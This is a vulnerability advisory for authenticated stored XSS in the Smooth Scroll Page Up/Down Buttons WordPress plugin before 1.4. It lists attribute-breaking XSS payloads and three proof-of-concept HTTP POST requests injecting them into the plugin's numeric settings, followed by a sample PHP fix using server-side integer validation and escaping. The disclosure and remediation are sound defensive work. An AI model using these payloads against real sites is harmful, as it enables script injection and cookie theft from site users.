WordPress Plugin Vulnerabilities

Smooth Scroll Page Up/Down Buttons < 1.4 - Authenticated Stored XSS

Description

The plugin did not properly sanitise and validate its settings (such as psb_distance, psb_buttonsize and psb_speed) on the server side; they were only validated client side. This could allow high-privilege users (such as admin) to store XSS payloads in them.

Proof of Concept

### -- [ Payloads: ]

[$] " autofocus=autofocus onfocus=alert(document.cookie); "

[$] " autofocus=autofocus onfocus=alert(document.domain); "



### -- [ PoC #1 | Authenticated Persistent XSS | Scrolling distance: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_buttonsize=13&psb_speed=13



### -- [ PoC #2 | Authenticated Persistent XSS | Button size: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_speed=13



### -- [ PoC #3 | Authenticated Persistent XSS | Scrolling speed: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=13&psb_speed=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.domain%29%3B+%22
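The root cause above is that the numeric settings are accepted as submitted. The following is an added example of a server-side save handler that rejects non-integer values for the three fields named in the advisory; it is not the plugin's own code, and the function names, nonce action name, option defaults and ranges are assumptions.

```php
<?php
// Added example (not the plugin's code): server-side validation for the
// settings named in the advisory. Function names, nonce action and ranges
// are assumptions; the plugin's real handler is not shown on this page.

add_action( 'admin_post_save_page_scroll_buttons_options', 'example_psb_save_options' );

function example_psb_save_options() {
    // Capability and CSRF checks come first.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'save_page_scroll_buttons_options' );

    // Each setting is an integer in a bounded range. Anything else falls back
    // to the default, so an attribute-breaking string never reaches the database.
    $rules = array(
        'psb_distance'   => array( 'default' => 100, 'min' => 0,  'max' => 5000 ),
        'psb_buttonsize' => array( 'default' => 40,  'min' => 10, 'max' => 200 ),
        'psb_speed'      => array( 'default' => 500, 'min' => 0,  'max' => 10000 ),
    );
    foreach ( $rules as $name => $rule ) {
        $raw = isset( $_POST[ $name ] ) ? wp_unslash( $_POST[ $name ] ) : '';
        // FILTER_VALIDATE_INT returns false for anything that is not an integer
        // within the given range, including the payloads shown above.
        $value = filter_var( $raw, FILTER_VALIDATE_INT, array( 'options' => array(
            'min_range' => $rule['min'],
            'max_range' => $rule['max'],
        ) ) );
        update_option( $name, false === $value ? $rule['default'] : $value );
    }

    // Checkbox: store a fixed value rather than the submitted string.
    update_option( 'psb_topbutton', isset( $_POST['psb_topbutton'] ) ? 1 : 0 );

    wp_safe_redirect( admin_url( 'options-general.php?page=pagescrollupdownmenu&updated=1' ) );
    exit;
}

// Output escaping as defence in depth: even a value stored by an older,
// unpatched version cannot break out of the attribute when rendered.
function example_psb_render_field( $name, $default ) {
    $value = (int) get_option( $name, $default );
    printf(
        '<input type="number" name="%1$s" value="%2$s">',
        esc_attr( $name ),
        esc_attr( (string) $value )
    );
}
```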

Classification

Type
XSS

Miscellaneous

Original Researcher
m0ze
Submitter
m0ze
Verified
Yes

Timeline

Publicly Published
2021-05-17
Added
2021-05-17
Last Updated
2021-05-18